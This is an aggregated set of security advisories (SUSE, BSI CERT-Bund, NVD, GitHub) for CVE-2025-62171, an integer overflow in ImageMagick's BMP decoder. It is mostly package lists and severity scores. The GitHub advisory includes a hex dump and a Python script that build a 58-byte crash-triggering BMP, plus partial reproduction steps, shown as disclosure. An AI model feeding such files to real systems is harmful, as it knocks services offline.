"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.7-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-62171",
"url": "https://www.suse.com/security/cve/CVE-2025-62171"
},
{
"category": "external",
"summary": "SUSE Bug 1252282 for CVE-2025-62171",
"url": "https://bugzilla.suse.com/1252282"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:ImageMagick-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.7-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:ImageMagick-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.7-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-21T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-62171"
}
]
}
wid-sec-w-2025-2339
Vulnerability from csaf_certbund
Published
2025-10-19 22:00
Modified
2025-10-30 23:00
Summary
ImageMagick (BMP decoder): Schwachstelle ermöglicht Denial of Service
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
ImageMagick ist eine Sammlung von Programmbibliotheken und Werkzeugen, die Grafiken in zahlreichen Formaten verarbeiten kann.
Angriff
Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in ImageMagick ausnutzen, um einen Denial of Service Angriff durchzuführen.
Betroffene Betriebssysteme
- Sonstiges
- UNIX
- Windows
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "ImageMagick ist eine Sammlung von Programmbibliotheken und Werkzeugen, die Grafiken in zahlreichen Formaten verarbeiten kann.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in ImageMagick ausnutzen, um einen Denial of Service Angriff durchzuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2025-2339 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-2339.json"
},
{
"category": "self",
"summary": "WID-SEC-2025-2339 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-2339"
},
{
"category": "external",
"summary": "Red Hat Bugtracker vom 2025-10-19",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2404735"
},
{
"category": "external",
"summary": "openSUSE Security Update OPENSUSE-SU-2025:15650-1 vom 2025-10-22",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/TQOUR4GFDPWU5LZC7XGPGIDCUGFZS223/"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2025:3796-1 vom 2025-10-27",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2025-October/023033.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2025:3844-1 vom 2025-10-28",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2025-October/023076.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2025:3867-1 vom 2025-10-30",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2025-October/023090.html"
}
],
"source_lang": "en-US",
"title": "ImageMagick (BMP decoder): Schwachstelle erm\u00f6glicht Denial of Service",
"tracking": {
"current_release_date": "2025-10-30T23:00:00.000+00:00",
"generator": {
"date": "2025-10-31T09:28:54.795+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.4.0"
}
},
"id": "WID-SEC-W-2025-2339",
"initial_release_date": "2025-10-19T22:00:00.000+00:00",
"revision_history": [
{
"date": "2025-10-19T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2025-10-22T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von openSUSE aufgenommen"
},
{
"date": "2025-10-26T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2025-10-28T23:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2025-10-30T23:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von SUSE aufgenommen"
}
],
"status": "final",
"version": "5"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c7.1.2-7",
"product": {
"name": "Open Source ImageMagick \u003c7.1.2-7",
"product_id": "T047822"
}
},
{
"category": "product_version",
"name": "7.1.2-7",
"product": {
"name": "Open Source ImageMagick 7.1.2-7",
"product_id": "T047822-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:imagemagick:imagemagick:7.1.2-7"
}
}
},
{
"category": "product_version_range",
"name": "\u003c6.9.13-32",
"product": {
"name": "Open Source ImageMagick \u003c6.9.13-32",
"product_id": "T047823"
}
},
{
"category": "product_version",
"name": "6.9.13-32",
"product": {
"name": "Open Source ImageMagick 6.9.13-32",
"product_id": "T047823-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:imagemagick:imagemagick:6.9.13-32"
}
}
}
],
"category": "product_name",
"name": "ImageMagick"
}
],
"category": "vendor",
"name": "Open Source"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux",
"product": {
"name": "SUSE Linux",
"product_id": "T002207",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse_linux:-"
}
}
},
{
"category": "product_name",
"name": "SUSE openSUSE",
"product": {
"name": "SUSE openSUSE",
"product_id": "T027843",
"product_identification_helper": {
"cpe": "cpe:/o:suse:opensuse:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-62171",
"product_status": {
"known_affected": [
"T047823",
"T047822",
"T002207",
"T027843"
]
},
"release_date": "2025-10-19T22:00:00.000+00:00",
"title": "CVE-2025-62171"
}
]
}
fkie_cve-2025-62171
Vulnerability from fkie_nvd
Published
2025-10-17 17:15
Modified
2025-10-24 17:06
Severity ?
5.9 (Medium) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Summary
ImageMagick is an open source software suite for displaying, converting, and editing raster image files. In ImageMagick versions prior to 7.1.2-7 and 6.9.13-32, an integer overflow vulnerability exists in the BMP decoder on 32-bit systems. The vulnerability occurs in coders/bmp.c when calculating the extent value by multiplying image columns by bits per pixel. On 32-bit systems with size_t of 4 bytes, a malicious BMP file with specific dimensions can cause this multiplication to overflow and wrap to zero. The overflow check added to address CVE-2025-57803 is placed after the overflow occurs, making it ineffective. A specially crafted 58-byte BMP file with width set to 536,870,912 and 32 bits per pixel can trigger this overflow, causing the bytes_per_line calculation to become zero. This vulnerability only affects 32-bit builds of ImageMagick where default resource limits for width, height, and area have been manually increased beyond their defaults. 64-bit systems with size_t of 8 bytes are not vulnerable, and systems using default ImageMagick resource limits are not vulnerable. The vulnerability is fixed in versions 7.1.2-7 and 6.9.13-32.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| imagemagick | imagemagick | * | |
| imagemagick | imagemagick | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB78F6C2-7C33-4A0A-A093-6A26A8B9C3BF",
"versionEndExcluding": "6.9.13-32",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5F3152BE-0219-45B9-940F-86EED0E01510",
"versionEndExcluding": "7.1.2-7",
"versionStartIncluding": "7.0.0-0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "ImageMagick is an open source software suite for displaying, converting, and editing raster image files. In ImageMagick versions prior to 7.1.2-7 and 6.9.13-32, an integer overflow vulnerability exists in the BMP decoder on 32-bit systems. The vulnerability occurs in coders/bmp.c when calculating the extent value by multiplying image columns by bits per pixel. On 32-bit systems with size_t of 4 bytes, a malicious BMP file with specific dimensions can cause this multiplication to overflow and wrap to zero. The overflow check added to address CVE-2025-57803 is placed after the overflow occurs, making it ineffective. A specially crafted 58-byte BMP file with width set to 536,870,912 and 32 bits per pixel can trigger this overflow, causing the bytes_per_line calculation to become zero. This vulnerability only affects 32-bit builds of ImageMagick where default resource limits for width, height, and area have been manually increased beyond their defaults. 64-bit systems with size_t of 8 bytes are not vulnerable, and systems using default ImageMagick resource limits are not vulnerable. The vulnerability is fixed in versions 7.1.2-7 and 6.9.13-32."
}
],
"id": "CVE-2025-62171",
"lastModified": "2025-10-24T17:06:27.163",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2025-10-17T17:15:49.197",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/cea1693e2ded51b4cc91c70c54096cbed1691c00"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9pp9-cfwx-54rm"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-190"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
ghsa-9pp9-cfwx-54rm
Vulnerability from github
Published
2025-10-28 14:43
Modified
2025-10-28 14:43
Severity ?
VLAI Severity ?
Summary
ImageMagick has Integer Overflow in BMP Decoder (ReadBMP)
Details
Summary
CVE-2025-57803 claims to be patched in ImageMagick 7.1.2-2, but the fix is incomplete and ineffective. The latest version 7.1.2-5 remains vulnerable to the same integer overflow attack.
The patch added BMPOverflowCheck() but placed it after the overflow occurs, making it useless. A malicious 58-byte BMP file can trigger AddressSanitizer crashes and DoS.
Affected Versions: - ImageMagick < 7.1.2-2 (originally reported) - ImageMagick 7.1.2-2 through 7.1.2-5 (incomplete patch)
Platform and Configuration Requirements:
- 32-bit systems ONLY (i386, i686, armv7l, etc.)
- Requires size_t = 4 bytes. (64-bit systems are NOT vulnerable (size_t = 8 bytes))
- Requires modified resource limits: The default width, height, and area limits must have been manually increased (Systems using default ImageMagick resource limits are NOT vulnerable).
Details(Root Cause Analysis)
Vulnerable Code Location
File: coders/bmp.c
Lines: 1120-1122 (in version 7.1.2-5)
The Incomplete Patch
```c // Line 1120: Integer overflow happens HERE extent = image->columns * bmp_info.bits_per_pixel; // OVERFLOW!
// Line 1121: Uses already-overflowed value bytes_per_line = 4*((extent+31)/32);
// Line 1122: Checks the RESULT, not the multiplication if (BMPOverflowCheck(bytes_per_line, image->rows) != MagickFalse) ThrowReaderException(CorruptImageError, "InsufficientImageDataInFile"); ```
Why the Patch Fails
Attack Vector (32-bit system): ``` Input BMP Header: Width: 536,870,912 (0x20000000) Height: 1 Bits Per Pixel: 32
Calculation on 32-bit system: extent = 536,870,912 × 32 = 17,179,869,184 (0x400000000)
32-bit truncation: 0x400000000 & 0xFFFFFFFF = 0x00000000 ← Overflow to ZERO!
bytes_per_line = 4 × ((0 + 31) / 32) = 4 × 0 = 0
BMPOverflowCheck(0, 1): return (1 != 0) && (0 > 4294967295UL/1) return True && (0 > 4294967295) return True && False return False ← Does NOT detect overflow! ```
The check fails because:
1. The overflow happens at Line 1120 (extent calculation)
2. extent becomes 0 due to 32-bit truncation
3. bytes_per_line is calculated as 0 (Line 1121)
4. BMPOverflowCheck(0, 1) returns False (no overflow detected)
5. Code proceeds with corrupted values → ASan crash
PoC(Proof of Concept)
Minimal 58-byte BMP File
Hex dump:
00000000 42 4d 3a 00 00 00 00 00 00 00 36 00 00 00 28 00 |BM:.......6...(.|
00000010 00 00 00 00 00 20 01 00 00 00 01 00 20 00 00 00 |..... ...... ...|
00000020 00 00 00 00 00 00 13 0b 00 00 13 0b 00 00 00 00 |................|
00000030 00 00 00 00 00 00 00 00 00 00 |..........|
Key Fields:
- Offset 0x12: Width = 00 00 00 20 = 0x20000000 (536,870,912)
- Offset 0x16: Height = 01 00 00 00 = 1
- Offset 0x1C: BPP = 20 00 = 32
Python Generator
```python
!/usr/bin/env python3
import struct
width = 0x20000000 # 536,870,912 height = 1 bpp = 32
BMP File Header (14 bytes)
file_header = b'BM' file_header += struct.pack('<I', 58) # File size file_header += struct.pack('<HH', 0, 0) # Reserved file_header += struct.pack('<I', 54) # Pixel offset
DIB Header (40 bytes)
dib_header = struct.pack('<I', 40) # Header size dib_header += struct.pack('<i', width) # Width dib_header += struct.pack('<i', height) # Height dib_header += struct.pack('<H', 1) # Planes dib_header += struct.pack('<H', bpp) # BPP dib_header += struct.pack('<I', 0) # Compression dib_header += struct.pack('<I', 0) # Image size dib_header += struct.pack('<i', 2835) # X ppm dib_header += struct.pack('<i', 2835) # Y ppm dib_header += struct.pack('<I', 0) # Colors dib_header += struct.pack('<I', 0) # Important colors
pixel_data = b'\x00\x00\x00\x00'
with open('overflow.bmp', 'wb') as f: f.write(file_header + dib_header + pixel_data)
print(f"Created overflow.bmp (58 bytes)") ```
Reproduction Steps
Environment Setup
```bash
Use 32-bit Docker container
docker run -it --name test-32bit i386/ubuntu:latest bash
Install dependencies
apt-get update apt-get install -y clang build-essential wget tar \ libpng-dev libjpeg-dev libfreetype6-dev libxml2-dev \ zlib1g-dev liblzma-dev libbz2-dev
Download ImageMagick 7.1.2-5
